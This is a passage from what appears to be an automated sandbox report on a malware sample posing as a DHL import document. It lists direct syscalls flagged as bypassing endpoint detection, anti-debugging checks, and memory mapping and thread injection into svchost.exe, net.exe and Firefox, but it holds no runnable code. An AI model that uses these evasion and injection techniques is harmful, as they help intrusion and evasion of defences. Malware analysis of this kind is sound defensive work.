Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A68A90 mov edx, dword ptr fs:[00000030h]	1_2_03A68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	1_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	1_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]	1_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]	1_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A86ACC mov eax, dword ptr fs:[00000030h]	1_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30AD0 mov eax, dword ptr fs:[00000030h]	1_2_03A30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	1_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	1_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6CA24 mov eax, dword ptr fs:[00000030h]	1_2_03A6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5EA2E mov eax, dword ptr fs:[00000030h]	1_2_03A5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A54A35 mov eax, dword ptr fs:[00000030h]	1_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A54A35 mov eax, dword ptr fs:[00000030h]	1_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABCA11 mov eax, dword ptr fs:[00000030h]	1_2_03ABCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	1_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADEA60 mov eax, dword ptr fs:[00000030h]	1_2_03ADEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AACA72 mov eax, dword ptr fs:[00000030h]	1_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AACA72 mov eax, dword ptr fs:[00000030h]	1_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36A50 mov eax, dword ptr fs:[00000030h]	1_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40A5B mov eax, dword ptr fs:[00000030h]	1_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40A5B mov eax, dword ptr fs:[00000030h]	1_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0 mov eax, dword ptr fs:[00000030h]	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A309AD mov eax, dword ptr fs:[00000030h]	1_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A309AD mov eax, dword ptr fs:[00000030h]	1_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB89B3 mov esi, dword ptr fs:[00000030h]	1_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	1_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	1_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]	1_2_03ABE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A629F9 mov eax, dword ptr fs:[00000030h]	1_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A629F9 mov eax, dword ptr fs:[00000030h]	1_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC69C0 mov eax, dword ptr fs:[00000030h]	1_2_03AC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A649D0 mov eax, dword ptr fs:[00000030h]	1_2_03A649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]	1_2_03AFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB892A mov eax, dword ptr fs:[00000030h]	1_2_03AB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC892B mov eax, dword ptr fs:[00000030h]	1_2_03AC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE908 mov eax, dword ptr fs:[00000030h]	1_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE908 mov eax, dword ptr fs:[00000030h]	1_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABC912 mov eax, dword ptr fs:[00000030h]	1_2_03ABC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28918 mov eax, dword ptr fs:[00000030h]	1_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28918 mov eax, dword ptr fs:[00000030h]	1_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]	1_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]	1_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A56962 mov eax, dword ptr fs:[00000030h]	1_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A7096E mov eax, dword ptr fs:[00000030h]	1_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A7096E mov edx, dword ptr fs:[00000030h]	1_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A7096E mov eax, dword ptr fs:[00000030h]	1_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD4978 mov eax, dword ptr fs:[00000030h]	1_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD4978 mov eax, dword ptr fs:[00000030h]	1_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABC97C mov eax, dword ptr fs:[00000030h]	1_2_03ABC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB0946 mov eax, dword ptr fs:[00000030h]	1_2_03AB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04940 mov eax, dword ptr fs:[00000030h]	1_2_03B04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30887 mov eax, dword ptr fs:[00000030h]	1_2_03A30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABC89D mov eax, dword ptr fs:[00000030h]	1_2_03ABC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]	1_2_03AFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	1_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	1_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]	1_2_03A5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B008C0 mov eax, dword ptr fs:[00000030h]	1_2_03B008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]	1_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]	1_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]	1_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov ecx, dword ptr fs:[00000030h]	1_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52835 mov eax, dword ptr fs:[00000030h]	1_2_03A52835

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_00540B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00540B62

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00512622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00512622
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0050083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0050083F
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_005009D5 SetUnhandledExceptionFilter,	0_2_005009D5
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00500C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00500C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtTerminateProcess: Direct from: 0x76F02D5C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: NULL target: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: NULL target: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\net.exe

Thread register set: target process: 8176

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\net.exe

Thread APC queued: target process: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EF0008

Jump to behavior

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

0_2_00541201

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_00522BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00522BA5

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0054B226 SendInput,keybd_event,

0_2_0054B226

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_005622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_005622DA

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Process created: C:\Windows\SysWOW64\wusa.exe "C:\Windows\SysWOW64\wusa.exe"	Jump to behavior
Source: C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

0_2_00540B62

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_00541663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00541663

Source: DHL_IMPORT_8236820594.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: DHL_IMPORT_8236820594.exe, gdWgEHryJDTaS.exe, 00000003.00000002.3506320173.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000000.1823345302.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506359615.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: gdWgEHryJDTaS.exe, 00000003.00000002.3506320173.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000000.1823345302.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506359615.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: gdWgEHryJDTaS.exe, 00000003.00000002.3506320173.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000000.1823345302.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506359615.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: gdWgEHryJDTaS.exe, 00000003.00000002.3506320173.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000003.00000000.1823345302.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506359615.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_00500698 cpuid

0_2_00500698

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_00558195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00558195

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0053D27A GetUserNameW,

0_2_0053D27A

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

